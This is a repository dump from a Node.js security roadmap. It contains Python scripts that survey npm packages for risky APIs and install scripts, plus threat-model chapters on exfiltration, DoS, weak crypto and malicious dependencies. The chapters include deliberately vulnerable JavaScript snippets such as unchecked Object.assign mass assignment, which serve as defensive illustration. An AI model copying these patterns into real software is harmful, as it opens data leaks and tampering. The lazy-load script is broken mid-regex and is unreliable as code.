    base_dir = os.path.dirname(node_modules)
    args = [
        'java',
        '-jar',
        os.path.join(
            base_dir,
            'tools',
            'closure-compiler-latest',
            'closure-compiler.jar'),
        '--process_common_js_modules',
        '--checks-only',
        '--third_party=true',
        '--module_resolution=NODE',
        '--js_module_root=%s' % os.path.realpath(node_modules),
        '--jscomp_error=conformanceViolations',
        '--conformance_configs',
        os.path.join(
            base_dir,
            'jsconf',
            'conformance_proto.textproto'),
    ]
    for (_, js_file) in srcs:
        args += ['--js', os.path.realpath(js_file)]
    for js_file in sorted(externs):
        args += ['--externs', js_file]

    # Report over-long command lines as a violation instead of letting
    # process creation fail.
    if len(' '.join(args)) >= arg_max:
        return ['Argument list too long']

    process = subprocess.Popen(
        args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    # stderr is merged into stdout, so the first element holds all output.
    content = process.communicate()[0]
    if not isinstance(content, str):
        # Python 3 yields bytes here; the str regexes below need text.
        content = content.decode('utf-8', 'replace')

    violations = []
    if process.returncode == 0:
        violations.append('Passed')
    for error_match in _error_re.finditer(content):
        violation = error_match.group(1)
        for simplifier in _simplifier_res:
            simplified = simplifier.match(violation)
            if simplified:
                # Keep only the captured text so that messages which
                # differ in identifiers or detail are grouped together.
                violation = '...'.join(simplified.groups())
        violations.append(violation)
    return violations
91 |
if __name__ == '__main__':
    # Usage: experiment.py <node_modules> <separate_modules> <top100_txt>
    # Writes a markdown report of JS Conformance violations to stdout.
    (node_modules, separate_modules, top100_txt) = sys.argv[1:]

    # One module name per line; blank lines are ignored.
    with open(top100_txt) as top100_file:
        top100 = [x for x in top100_file.read().split('\n') if x]

    # Externs live in an `externs` directory next to this script.
    # Files whose immediate parent directory is named `tests` are skipped.
    externs = set()
    for externs_file in py_common.npm.js_files_under(
            os.path.join(os.path.dirname(sys.argv[0]), 'externs')):
        if os.path.basename(os.path.dirname(externs_file)) == 'tests':
            continue
        externs.add(externs_file)

    # Maps each violation message to a dict that maps the name of an
    # offending module to the number of times the violation occurred in it.
    rule_violations = {}

    # Number of modules that the compiler was able to check.
    module_count = 0
    for module_name in top100:
        violations = run_jsconf(node_modules, module_name, externs)
        if not ('Parse error.' in violations
                or 'Argument list too long' in violations):
            module_count += 1
        # NOTE(review): violations of modules that failed to parse are still
        # tallied here, as the TODO below implies -- confirm intended nesting.
        for v in violations:
            vmap = rule_violations.setdefault(v, {})
            vmap[module_name] = vmap.get(module_name, 0) + 1

    # TODO: exclude Parse error and Argument list too long

    # Single-argument print(...) behaves the same under Python 2 and 3.
    print("## JS Conformance {#jsconf}")
    print("")
    print("JS Conformance identifies uses of risky APIs.")
    print("")
    print("Some modules did not parse.  This may be due to typescript.")
    print("JSCompiler doesn't deal well with mixed JavaScript and TypeScript")
    print("inputs.")
    print("")
    print("If a module is both in the top 100 and is a dependency of another")
    print("module in the top 100, then it will be multiply counted.")
    print("")
    print("Out of %d modules that parsed" % module_count)
    print("")
    print("| Violation | Count of Modules | Total Count | Quartiles |")
    print("| --------- | ---------------- | ----------- | --------- |")
    for (v, vmap) in sorted(rule_violations.items()):
        per_module = list(vmap.values())
        count = len(per_module)
        total_count = sum(per_module)
        # Modules that parsed but never triggered this violation count as 0.
        # A negative pad length (possible because unparsed modules are
        # tallied but not counted) yields no padding.
        values = sorted(per_module + [0] * (module_count - count))
        quartiles = '%d / %d / %d' % (
            values[len(values) >> 2],
            values[len(values) >> 1],
            values[(len(values) * 3) >> 2],
        )
        print("| `%s` | %d | %d | %s |" % (
            v, count, total_count, quartiles))
156 |
--------------------------------------------------------------------------------
/appendix/lazy-load/experiment.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | # Copyright 2017 Google LLC
4 | #
5 | # Licensed under the Apache License, Version 2.0 (the "License");
6 | # you may not use this file except in compliance with the License.
7 | # You may obtain a copy of the License at
8 | #
9 | # https://www.apache.org/licenses/LICENSE-2.0
10 | #
11 | # Unless required by applicable law or agreed to in writing, software
12 | # distributed under the License is distributed on an "AS IS" BASIS,
13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | # See the License for the specific language governing permissions and
15 | # limitations under the License.
16 |
17 | """Looks for lazy loading patterns.
18 |
19 | Patterns to identify include
20 |
21 | * { ... require(...)
22 |
23 | """
24 |
25 | import json
26 | import os.path
27 | import py_common.npm
28 | import re
29 | import shutil
30 | import sys
31 |
32 |
33 | lazy_load_pattern = re.compile(
34 | r'[{][^}]*(?>sys.stderr, "Falling back to worst-case for %s required by %s" % (
131 | # up_module_name, module_name)
132 | js_files.update([(up_module_name, src) for src in
133 | js_files_under(
134 | os.path.join(node_modules, up_module_name))
135 | if not probable_non_prod_file(src)])
136 | package_json = None
137 | try:
138 | package_json = json.loads(
139 | file(os.path.join(node_modules, up_module_name, 'package.json'), 'r')
140 | .read())
141 | except:
142 | print >>sys.stderr, "Undeclared dependency %s" % up_module_name
143 | if package_json is not None:
144 | unprocessed += package_json['dependencies'].keys()
145 | return tuple(sorted(js_files))
146 |
def requires(node_modules, module_name):
    """
    Follows require() calls to bound the set of JS files in a module.

    Starts at the "main" entry of the module's package.json and visits
    every file reachable through require(...) calls whose argument is a
    single quoted string literal.  Relative requires are resolved against
    the directory of the requiring file and followed; all other required
    names are recorded as dependencies.  A directory is expanded to every
    JS file under it.

    Returns {
      'srcs': (...),  # main.js and same-module files required thereof
      'deps': (...),  # required modules
      'upper': True,  # True when srcs and deps accounts for all require calls.
    }
    where 'srcs' and 'deps' are sorted tuples.  'upper' is False when
    there is no "main", when a file could not be read, or when a require
    argument could not be understood.

    Raises IOError/ValueError when package.json is missing or malformed.
    """
    module_root = os.path.join(node_modules, module_name)
    with open(os.path.join(module_root, 'package.json')) as package_json_file:
        package_json = json.loads(package_json_file.read())
    main_files = package_json.get('main', None)
    # (str, type(u'')) is (str, unicode) under Python 2.
    if isinstance(main_files, (str, type(u''))):
        main_files = (main_files,)
    if not main_files:
        return { 'srcs': (), 'deps': (), 'upper': False }
    srcs = set()
    deps = set()
    upper = True
    visited = set()
    unprocessed = [os.path.join(module_root, rp) for rp in main_files]
    while unprocessed:
        src = os.path.realpath(unprocessed.pop())
        if src in visited:
            continue
        visited.add(src)
        if os.path.isdir(src):
            unprocessed.extend(js_files_under(src))
            continue
        srcs.add(src)
        try:
            with open(src, 'r') as src_file:
                content = src_file.read()
        except (IOError, OSError):
            # An unreadable file may hide require calls.
            upper = False
            continue
        for match in _REQUIRE_RE.finditer(content):
            arg = match.group(1).strip()
            if not arg:
                continue  # Zero arguments
            is_string_literal = (
                len(arg) > 2 and arg[0] in ('"', "'") and arg[0] == arg[-1])
            if not is_string_literal:
                # Computed require target; cannot be followed statically.
                upper = False
                continue
            try:
                arg = json.loads('"%s"' % arg[1:-1])
            except ValueError:
                # Do not record the raw, still-quoted text as a dependency.
                upper = False
                continue
            if _REL_REQUIRE_RE.match(arg):
                if not arg.endswith('.js'):
                    arg += '.js'
                # Relative requires are relative to the requiring file,
                # not to the current working directory.
                unprocessed.append(os.path.join(os.path.dirname(src), arg))
            else:
                deps.add(arg)
    return {
        'srcs': tuple(sorted(srcs)),
        'deps': tuple(sorted(deps)),
        'upper': upper
    }
206 |
def js_files_under(root_dir):
    """
    Yields the path of each file under root_dir, at any depth, whose name
    ends with .js or .ts.
    """
    for (parent, _, names) in os.walk(root_dir):
        for name in names:
            if name.endswith(('.js', '.ts')):
                yield os.path.join(parent, name)
212 |
def preprocess_js_content(content):
    """
    Canonicalizes JS source text so that it is easier to pattern match.

    The content is lexed with jslex.  Each comment token is replaced
    with a single space, and the text of string and regex literal
    tokens is upper-cased so that lower-case keywords and identifiers
    can be told apart from similar text inside a literal.  All other
    tokens pass through unchanged.

    Returns the concatenation of the resulting token texts.
    """

    def canonical_text(tok_type, tok_content):
        if tok_type in ('comment', 'linecomment'):
            return ' '
        if tok_type in ('regex', 'string'):
            return tok_content.upper()
        return tok_content

    lexer = jslex.jslex.JsLexer()
    return ''.join(
        [canonical_text(tok_type, tok_content)
         for (tok_type, tok_content) in lexer.lex(content)])
234 |
def js_srcs_matching(node_modules, module_name, pattern, module_filter=None):
    """
    A list of the module's srcs whose content matches pattern.

    The candidate srcs come from js_srcs_almost_worst_case, called with
    the same node_modules, module_name and module_filter.  Each src is a
    pair whose second element is the file path.  The pattern is searched
    for in the output of preprocess_js_content, not in the raw file
    text, so it sees comments blanked out and literals upper-cased.

    Returns the matching srcs, as pairs, in the order they were listed.
    """

    srcs = js_srcs_almost_worst_case(
        node_modules=node_modules,
        module_name=module_name,
        module_filter=module_filter)

    matching_srcs = []
    for src in srcs:
        (_, path) = src
        # Close each file promptly; there may be many srcs.
        with open(path, 'r') as js_file:
            canon_content = preprocess_js_content(js_file.read())
        if pattern.search(canon_content):
            matching_srcs.append(src)
    return matching_srcs
254 |
# by visual examination of
# `find node_modules/ -type d | perl -pe 's|/|\n|g' | sort | uniq`
# Matches, case-insensitively, a whole path element that names a directory
# of tests, demos, examples, benchmarks or GitHub metadata.
_NON_PROD_PATH = re.compile(
    r'(?i)(?:^|[/\\])(?:tests?|testdata|testing|[.]github|__tests__|demo|examples?|benchmarks?)(?:$|[/\\])')
def probable_non_prod_file(path):
    """
    True when path probably does not name production code.

    A path qualifies when one of its elements, delimited by / or \\ or
    the ends of the string, is exactly one of the non-production names
    in _NON_PROD_PATH.  Used to skip such files when falling back to
    directory scanning.
    """
    return _NON_PROD_PATH.search(path) is not None
264 |
--------------------------------------------------------------------------------
/appendix/test-code/experiment.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | # Copyright 2017 Google LLC
4 | #
5 | # Licensed under the Apache License, Version 2.0 (the "License");
6 | # you may not use this file except in compliance with the License.
7 | # You may obtain a copy of the License at
8 | #
9 | # https://www.apache.org/licenses/LICENSE-2.0
10 | #
11 | # Unless required by applicable law or agreed to in writing, software
12 | # distributed under the License is distributed on an "AS IS" BASIS,
13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | # See the License for the specific language governing permissions and
15 | # limitations under the License.
16 |
17 | """Looks for test code patterns under node_modules.
18 |
19 | Patterns to identify include
20 |
21 | * require('assert')
22 | * require('chai')
23 | * require('chai/*')
24 | * require('mocha')
25 | * require('should')
26 | * require('unexpected')
27 |
28 | """
29 |
30 | import json
31 | import os.path
32 | import py_common.npm
33 | import re
34 | import shutil
35 | import sys
36 |
37 |
# Matches a call to require whose argument is a quoted string naming one
# of the test libraries listed in the module docstring.  `require` must not
# be preceded by a `.` or a word character, so method calls like
# `foo.require(...)` and longer identifiers do not match.
# `chai/` may be followed by any non-empty run of non-quote characters.
test_code_pattern = re.compile(
    r'(?m)(?:^|[^.\w])require\s*[(]\s*[\'\"](?:assert|chai|chai/[^\'\"]+|mocha|should|unexpected)[\'\"]')
40 |
41 |
if __name__ == '__main__':
    # Usage: experiment.py <node_modules> <separate_modules> <top100_txt>
    # Reports how many of the listed modules contain a file that matches
    # test_code_pattern.
    (node_modules, separate_modules, top100_txt) = sys.argv[1:]

    # One module name per line; blank lines are ignored.
    with open(top100_txt) as top100_file:
        top100 = [x for x in top100_file.read().split('\n') if x]

    uses = 0         # modules with at least one matching file
    total_count = 0  # modules examined
    for module_name in top100:
        module_root = os.path.join(separate_modules, module_name)
        for js_file in py_common.npm.js_files_under(module_root):
            with open(js_file, 'r') as js_in:
                js_content = js_in.read()
            if test_code_pattern.search(js_content):
                uses += 1
                break  # One matching file is enough to count the module.
        total_count += 1

    # Avoid dividing by zero when the module list is empty.
    percent = (100.0 * uses) / total_count if total_count else 0.0

    print (
"""
## Prod bundle includes test code {#test_code}

Some of the top 100 modules are test code, e.g. mocha, chai.
This measures which modules, when installed `--only=prod` include
test patterns.

%d of %d = %1.02f%% contain test code patterns
""" % (uses, total_count, percent))
69 |
--------------------------------------------------------------------------------
/appendix/top100.txt:
--------------------------------------------------------------------------------
1 | async
2 | babel-core
3 | babel-preset-es2015
4 | babel-runtime
5 | bluebird
6 | body-parser
7 | chalk
8 | cheerio
9 | classnames
10 | coffee-script
11 | colors
12 | commander
13 | debug
14 | express
15 | fs-extra
16 | glob
17 | gulp
18 | gulp-util
19 | jquery
20 | lodash
21 | minimist
22 | mkdirp
23 | moment
24 | prop-types
25 | q
26 | react
27 | react-dom
28 | request
29 | rxjs
30 | through2
31 | underscore
32 | uuid
33 | webpack
34 | winston
35 | yargs
36 | yeoman-generator
37 | @angular/common
38 | @angular/core
39 | aws-sdk
40 | axios
41 | babel-loader
42 | babel-polyfill
43 | chai
44 | co
45 | core-js
46 | css-loader
47 | ejs
48 | ember-cli-babel
49 | eslint
50 | handlebars
51 | inquirer
52 | joi
53 | js-yaml
54 | mocha
55 | mongodb
56 | mongoose
57 | node-uuid
58 | object-assign
59 | optimist
60 | ramda
61 | react-redux
62 | redis
63 | redux
64 | request-promise
65 | rimraf
66 | semver
67 | shelljs
68 | socket.io
69 | superagent
70 | xml2js
71 | yosay
72 | zone.js
73 | @angular/compiler
74 | @angular/forms
75 | @angular/http
76 | @angular/platform-browser
77 | @angular/platform-browser-dynamic
78 | @types/node
79 | angular
80 | autoprefixer
81 | babel-eslint
82 | babel-preset-react
83 | bootstrap
84 | cookie-parser
85 | dotenv
86 | es6-promise
87 | eslint-plugin-react
88 | extend
89 | extract-text-webpack-plugin
90 | file-loader
91 | immutable
92 | jade
93 | jsonwebtoken
94 | marked
95 | mime
96 | morgan
97 | mysql
98 | nan
99 | node-sass
100 | path
101 | promise
102 | react-router
103 | style-loader
104 | typescript
105 | uglify-js
106 | underscore.string
107 | vue
108 | ws
109 |
--------------------------------------------------------------------------------
/appendix/uses-scripts/experiment.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | # Copyright 2017 Google LLC
4 | #
5 | # Licensed under the Apache License, Version 2.0 (the "License");
6 | # you may not use this file except in compliance with the License.
7 | # You may obtain a copy of the License at
8 | #
9 | # https://www.apache.org/licenses/LICENSE-2.0
10 | #
11 | # Unless required by applicable law or agreed to in writing, software
12 | # distributed under the License is distributed on an "AS IS" BASIS,
13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | # See the License for the specific language governing permissions and
15 | # limitations under the License.
16 |
17 | """Collates how many projects use install scripts.
18 |
19 | Per https://docs.npmjs.com/misc/scripts we look for the
20 | following keys under "scripts" in package.json:
21 |
22 | * preinstall
23 | * install
24 | * postinstall
25 | """
26 |
27 | import json
28 | import os.path
29 | import py_common.npm
30 | import sys
31 |
def uses_scripts(package_root):
    """
    True when the package declares an installation script.

    Reads package.json from the directory package_root and looks under
    its "scripts" entry for any of the keys preinstall, install or
    postinstall.  Only the presence of a key is checked, not its value.

    Returns False when there is no "scripts" entry or it is null.
    Raises IOError/ValueError when package.json is missing or malformed.
    """
    with open(os.path.join(package_root, 'package.json')) as package_json_file:
        package_json = json.loads(package_json_file.read())
    scripts_obj = package_json.get('scripts', None)
    if scripts_obj is None:
        return False
    # TODO: True if empty value
    return any(
        script_type in scripts_obj
        for script_type in ('preinstall', 'install', 'postinstall'))
42 |
if __name__ == '__main__':
    # Usage: experiment.py <node_modules> <separate_modules> <top100_txt>
    # Reports the fraction of packages that declare installation scripts.
    (node_modules, separate_modules, top100_txt) = sys.argv[1:]

    # The per-package results of calling uses_scripts.
    per_package = py_common.npm.for_each_npm_package(
        node_modules, uses_scripts)
    # Counters get their own names so the uses_scripts function is not
    # rebound to an int.
    total_count = 0
    script_user_count = 0
    for uses in per_package.values():
        if uses:
            script_user_count += 1
        total_count += 1

    # Avoid dividing by zero when no packages were found.
    percent = (100.0 * script_user_count) / total_count if total_count else 0.0

    print (
"""
## Uses Scripts {#uses_scripts}

Unless steps are taken, installation scripts run code on
a developer's workstation when they have write access to
local repositories.  If this number is small, having
humans check installation scripts before running might
be feasible.

%d of %d = %1.02f%% use installation scripts
""" % (script_user_count, total_count, percent))
66 |
--------------------------------------------------------------------------------
/book.json.withcomments:
--------------------------------------------------------------------------------
1 | # Comments are stripped
2 | {
3 | "root": ".",
4 | "structure": {
5 | "readme": "cover.md"
6 | },
7 | "title": "A Roadmap for Node.js Security",
8 | "description": "Discusses security and privacy threats to the Node.js community and ways the community might address them. Assumes a basic familiarity with JS & the Node ecosystem.",
9 | "author": "Mike Samuel et al",
10 | "language": "en",
11 | "gitbook": ">= 3.0.0",
12 | "plugins": [
13 | "links",
14 | "ga"
15 | ],
16 | "pluginsConfig": {
17 | # Google Analytics integration
18 | "ga": {
19 | "token": "UA-111883728-1",
20 | "configuration": {
21 | "anonymizeIp": true,
22 | "forceSSL": true
23 | }
24 | },
25 | "links": {
26 | "links": [
27 | {
28 | # Adds a printer icon at the top.
29 | # See styles/website.css for styling.
30 | "label": "Printable",
31 | # "icon" corresponds to a classname
32 | "icon": "print-button",
33 | # `make pdf` produces book.json which
34 | # needs to be copied into _book/ for
35 | # this to work.
36 | # TODO: Point to an authoritative version
37 | # via absolute URL once published.
38 | "url": "/node-sec-roadmap.pdf"
39 | },
40 | {
41 | "label": "Github",
42 | "icon": "github-button",
43 | "url": "https://github.com/google/node-sec-roadmap"
44 | }
45 | ]
46 | }
47 | }
48 | }
49 |
--------------------------------------------------------------------------------
/chapter-1/recap.md:
--------------------------------------------------------------------------------
1 | We've discussed the kinds of threats that concern us.
2 |
3 | Next we discuss how some Node.js projects mitigate these threats today
4 | and how we can make it easier for more Node.js projects to
5 | consistently mitigate these threats.
6 |
7 | Readers may find it useful to refer back to the [threat table][] which
8 | cross-indexes threats and mitigation strategies.
9 |
10 | [threat table]: threats.md#threat_table
11 |
--------------------------------------------------------------------------------
/chapter-1/threat-0DY.md:
--------------------------------------------------------------------------------
1 | # Zero Day
2 |
3 | When a researcher discloses a new security vulnerability, the clock
4 | starts ticking. An attacker can compromise a product if they can
5 | weaponize the disclosure before the product team
6 |
7 | * realizes they're vulnerable, and
8 | * finds a patch to the vulnerable dependency, or rolls their own, and
9 | * tests the patched release and pushes it into production.
10 |
11 | ["The Best Defenses Against Zero-day Exploits for Various-sized
12 | Organizations"][sans] notes
13 |
14 | > Zero-day exploits are vulnerabilities that have yet to be publicly
15 | > disclosed. These exploits are usually the most difficult to defend
16 | > against because data is generally only available for analysis after
17 | > the attack has completed its course.
18 |
19 | > ...
20 |
21 | > The research community has broadly classified the defense techniques
22 | > against zero-day exploits as statistical-based, signature-based,
23 | > behavior-based, and hybrid techniques (Kaur & Singh, 2014). The
24 | > primary goal of each of these techniques is to identify the exploit in
25 | > real time or as close to real time as possible and quarantine the
26 | > specific attack to eliminate or minimize the damage caused by the
27 | > attack.
28 |
29 | Being able to respond quickly to limit damage and recover are
30 | critical.
31 |
32 | That same paper talks at length about *worms*: programs that
33 | compromise a system without explicit direction by a human attacker,
34 | and use the compromise of one system to find other systems to
35 | automatically compromise.
36 |
37 | Researchers have found ways ([details][saccone]) that worms
38 | might propagate throughout `registry.npmjs.org` and common practices
39 | that might allow a compromise to jump from the module repository to
40 | large numbers of production servers.
41 |
42 | If we can structure systems so that compromising one component
43 | does not make it easier to compromise another component, then
44 | we can contain damage due to worms.
45 |
46 | If, in a population of components, we can keep susceptibility below a
47 | critical threshold so that worms spend more time searching for targets
48 | than compromising targets, then we can buy time for humans to
49 | understand and respond.
50 |
51 | If we prevent compromise of a population of modules by a zero day
52 | from causing widespread compromise of a population of production
53 | servers then we can limit damage to end users.
54 |
55 | [sans]: https://www.sans.org/reading-room/whitepapers/bestprac/defenses-zero-day-exploits-various-sized-organizations-35562
56 | [saccone]: https://www.kb.cert.org/CERT_WEB/services/vul-notes.nsf/6eacfaeab94596f5852569290066a50b/018dbb99def6980185257f820013f175/$FILE/npmwormdisclosure.pdf
57 |
--------------------------------------------------------------------------------
/chapter-1/threat-BOF.md:
--------------------------------------------------------------------------------
1 | # Buffer Overflow
2 |
3 | A buffer overflow occurs when code fails to check an index into an
4 | array while unpacking input, allowing parts of that input to overwrite
5 | memory locations that other trusted code assumes are inviolable.
6 | A similar technique also allows exfiltrating data like cryptographic keys
7 | when an unchecked limit leads to copying unintended memory locations into
8 | an output.
9 |
10 | Buffer overflow vectors in Node.js are:
11 |
12 | * The Node.js runtime and dependencies like the JS runtime and OpenSSL
13 | * [C++ addons][]: third-party modules that use N-API (the native API).
14 | * Child processes. For example, code may route a request body to an
15 | [image processing library][imagetragick] that was not
16 | written with untrusted inputs in mind.
17 |
18 | Buffer overflows are common, but we class them as low frequency for
19 | Node.js in particular. The runtime is highly reviewed compared to the
20 | average C++ backend; C++ addons are a small subset of third-party
21 | modules; and there's no reason to believe that child processes spawned
22 | by Node.js applications are especially risky.
23 |
24 | [imagetragick]: https://imagetragick.com/
25 | [C++ addons]: https://nodejs.org/api/addons.html#addons_c_addons
26 |
--------------------------------------------------------------------------------
/chapter-1/threat-CRY.md:
--------------------------------------------------------------------------------
1 | # Weak Crypto {#CRY}
2 |
3 | Cryptographic primitives are often the only practical way to solve
4 | important classes of problems, but it's easy to make mistakes when using
5 | `crypto.*` APIs.
6 | Failing to identify third-party modules that use crypto (or should be
7 | using crypto) and determining whether they are using it properly can lead
8 | to a false sense of security.
9 |
10 | ["Developer-Resistant Cryptography"][Cairns & Steel] by Cairns & Steel
11 | notes:
12 |
13 | > The field of cryptography is inherently difficult. Cryptographic API
14 | > development involves narrowing a large, complex field into a small set
15 | > of usable functions. Unfortunately, these APIs are often far from
16 | > simple.
17 |
18 | > ...
19 |
20 | > In 2013, study by Egele et al. revealed even more startling figures
21 | > [1]. In this study, six rules were defined which, if broken, indicated
22 | > the use of insecure protocols. More than 88% of the 11,000 apps
23 | > analyzed broke at least one rule. Of the rule-breaking apps, most
24 | > would break not just one, but multiple rules. Some of these errors
25 | > were attributed to negligence, for example test code included in
26 | > release versions. However, in most cases it appears developers
27 | > unknowingly created insecure apps.
28 |
29 | > ...
30 |
31 | > The human aspect can be improved through better education for
32 | > developers. Sadly, this approach is unlikely to be a complete
33 | > solution. It is unreasonable to expect a developer to be a security
34 | > expert when most of their time is spent on other aspects of software
35 | > design.
36 |
37 | Code that uses cryptography badly can seem like it's working as intended
38 | until an attacker unravels it.
39 | Testing code that uses cryptographic APIs is hard. It's hard to write
40 | a unit test to check that a skilled cryptographer can't efficiently
41 | extract information from a random looking string or compute a random
42 | looking string that passes a verifier.
43 |
44 | Weak cryptography can also mask other problems. For example, a
45 | security auditor might try to check for leaks of email addresses by
46 | creating a dummy account `Carol <carol@example.com>` and
47 | check for the string `carol@example.com` in data served in responses,
48 | while recursing into substrings encoded using base64, gzip, or other
49 | common encodings.
50 | If some of that data is poorly encrypted, then the auditor might
51 | falsely conclude that an attacker who can't break strong
52 | encryption does not have access to emails.
53 |
54 | [Cairns & Steel]: https://www.w3.org/2014/strint/papers/48.pdf
55 |
--------------------------------------------------------------------------------
/chapter-1/threat-DEX.md:
--------------------------------------------------------------------------------
1 | # Poor Developer Experience
2 |
3 | Security specialists have a vested interest in keeping developers
4 | happy & productive.
5 |
6 | Developer experience is not only a business or usability threat. When
7 | a team is less agile, it cannot respond as effectively to security
8 | threats, or roll out interfaces that let end users manage their own
9 | security and privacy.
10 |
11 | Application developers may miss deadlines, cut features, or
12 | compromise maintainability if any of the following are true:
13 |
14 | * starting a new project takes too long
15 | * they often cannot make progress until they get feedback from
16 | security specialists (or other specialists like I18N, Legal, UI)
17 | * repeated tasks are slow:
18 | * restarting an application or service,
19 | * running `npm install`, or
20 | * rerunning tests after small changes
21 | * getting approval for a pull request takes long enough that
22 | upstream has to be manually merged into the branch.
23 | * breaking common code out of an application into an npm
24 | module becomes hard, so it is easier to copy-paste from one
25 | application to another
26 | * a developer has to spend significant time getting a release
27 | candidate approved instead of working on the next iteration.
28 |
--------------------------------------------------------------------------------
/chapter-1/threat-DOS.md:
--------------------------------------------------------------------------------
1 |
2 | # Denial of Service
3 |
4 | Denial of service occurs when a well-behaved, authorized user cannot
5 | access a system because of misbehavior by another.
6 |
7 | "Denial of service" is most often associated with [flooding][] a
8 | network endpoint so it cannot respond to the smaller number of
9 | legitimate requests, but there are other vectors:
10 |
11 | * Causing the server to use up [a finite resource][res-exh]
12 | like file descriptors, causing threads to block.
13 | * Causing the target to issue a network request to an endpoint the
14 | attacker controls and responding slowly.
15 | * Causing the target to store malformed data which triggers an error
16 | in code that unpacks the stored data and causes a server to provide
17 | an error response to a well-formed request.
18 | * Exploiting event dispatch bugs to cause starvation
19 | ([example][disclosure]).
20 | * Supplying over-large inputs to super-linear (> O(n)) algorithms.
21 | For example supplying a crafted string to an ambiguous `RegExp`
22 | to cause [excessive backtracking][].
23 |
24 | Denial of service attacks that exploit the network layer are usually
25 | handled in the reverse proxy and we find no reason to suppose that
26 | node applications are especially vulnerable to other kinds of denial
27 | of service.
28 |
29 | ## Additional risk: Integrity depends on quick completion
30 |
31 | A system requires [atomicity][] when two or more effects have to
32 | happen together or not at all. Databases put a lot of engineering
33 | effort into ensuring atomicity.
34 |
35 | Sometimes, ad-hoc code seems to preserve atomicity when tested under
36 | low-load conditions:
37 |
38 | ```js
39 | // foo() and bar() need to happen together or not at all.
40 | foo(x);
41 | // Not much of a gap here under normal conditions for another part
42 | // of the system to observe foo() but not bar().
43 | try {
44 | bar(x);
45 | } catch (e) {
46 | undoFoo();
47 | throw e;
48 | }
49 | ```
50 |
51 | This code, though buggy, may be highly reliable under normal
52 | conditions, but may fail under load, or if an attacker can cause
53 | `bar()` to run for a while before its side-effect happens, for example
54 | by causing excessive backtracking in a regular expression used to
55 | check a precondition.
56 |
57 | Some of the same techniques that make a system unavailable can
58 | widen the window of vulnerability within which an attacker can exploit
59 | an atomicity failure.
60 |
61 | Client-side, runaway computations rarely escalate into an integrity
62 | violation since atomicity requirements are typically maintained on the
63 | server. Server-side, we expect that this problem would be more
64 | common.
65 |
66 | [flooding]: https://capec.mitre.org/data/definitions/125.html
67 | [excessive backtracking]: https://www.regular-expressions.info/catastrophic.html
68 | [res-exh]: https://capec.mitre.org/data/definitions/131.html
69 | [disclosure]: https://sandstorm.io/news/2015-04-08-osx-security-bug
70 | [atomicity]: https://en.wikipedia.org/wiki/ACID#Atomicity
71 |
--------------------------------------------------------------------------------
/chapter-1/threat-EXF.md:
--------------------------------------------------------------------------------
1 | # Exfiltration of Data
2 |
3 | "Exfiltration" happens when an attacker causes a response to include
4 | data that it should not have. Web applications and services may
5 | produce response bodies that include too much information.
6 |
7 | This can happen when server-side JavaScript has access to more
8 | data than it needs to do its job and either
9 |
10 | * it serializes unintended information and no one notices or
11 | * an attacker controls what is serialized.
12 |
13 | Consider
14 |
15 | ```js
16 | Object.assign(output, this[str]);
17 | ```
18 |
19 | If the attacker controls `str` then they may be able to pick any field
20 | of `this` or possibly any global field.
21 |
22 | This problem is not new to Node.js but we consider this higher
23 | frequency for Node.js for these reasons:
24 |
25 | * There is no equivalent to `Object.assign` in most backend languages.
26 | It's possible in Python and Java via reflective operators but
27 | security auditors can narrow down code that might suffer this vulnerability
28 | to those that use reflection.
29 | `Object.assign`, `$.extend` and similar operators are widely used in
30 | idiomatic JavaScript.
31 | * In most backend languages, `obj[...]` does not allow aliasing of all
32 | properties.
33 | For example, Python only allows `obj[...]` on types that implement
34 | `__getitem__`, which user-defined classes do not do by default.
35 | Java has generic collections and maps, but for user-defined classes
36 | the equivalent code pattern requires reflection and possibly calls to
37 | `setAccessible(true)`.
38 |
39 | JavaScript makes it easier to alias properties and methods and common
40 | JavaScript idioms make it harder for security auditors to narrow down
41 | code that might inadvertently allow exfiltration.
42 |
43 | `Object.assign` and related copy operators are also potential
44 | [mass assignment][] vectors as in:
45 |
46 | ```js
47 | Object.assign(systemData, JSON.parse(untrustedInput))
48 | ```
49 |
50 | [mass assignment]: https://en.wikipedia.org/wiki/Mass_assignment_vulnerability
51 |
--------------------------------------------------------------------------------
/chapter-1/threat-LQC.md:
--------------------------------------------------------------------------------
1 | # Low Quality Code
2 |
3 | An application or service is vulnerable when its security depends on a
4 | module upholding a contract that it does not uphold.
5 |
6 | Most new software has bugs when first released. Over time, maintainers
7 | fix the bugs that have obvious, bad consequences.
8 |
9 | Often, widely used software has problem areas that are well understood.
10 | Developers can make a pragmatic decision to use it while taking
11 | additional measures to make sure those problems don't compromise
12 | security guarantees.
13 |
14 | Orphaned code that has not been updated recently may have done a
15 | good job of enforcing its contract, but attackers may have discovered
16 | new tricks, or the threat environment may have changed so it may
17 | no longer enforce its contract in the face of an attack.
18 |
19 | Low quality code constitutes a threat when developers pick a module
20 | without understanding the caveats to the contract it actually
21 | provides, or without taking additional measures to limit damage when
22 | it fails.
23 |
24 | It may be the case that there's higher risk of poorly understood
25 | contracts when a community is experimenting rapidly as is the case for
26 | Node.js, or early on before the community has settled on clear winners
27 | for core functions, but we consider the frequency of vulnerabilities
28 | due to low quality code in the npm repository roughly the same as for
29 | other public module repositories.
30 |
--------------------------------------------------------------------------------
/chapter-1/threat-MTP.md:
--------------------------------------------------------------------------------
1 | # Malicious Third-Party Code
2 |
3 | Most open-source developers work in good faith to provide useful tools
4 | to the larger community of developers but
5 |
6 | * Passwords are easy to guess, so attackers can suborn accounts that
7 | are only protected by a password. On GitHub, developers may
8 | configure their accounts to require a
9 | [second factor][github-second-factor] but this is not yet the norm.
10 | * Pull requests that aren't thoroughly reviewed may dilute security
11 | properties.
12 | * Phishing requests targeted at GitHub users ([details][dimnie]) can
13 | execute code on unwary committers' machines.
14 | * A pull request may appear to come from a higher-reputation source
15 | ([details][unsigned commits]).
16 |
17 | Malicious code can appear in the server-side JavaScript running in
18 | production, or can take the form of install hooks that run on a
19 | developer workstation with access to local repositories and to
20 | writable elements of `$PATH`.
21 |
22 | Projects that deploy the latest version of a dependency straight to
23 | production are more vulnerable to malicious code. If an attacker
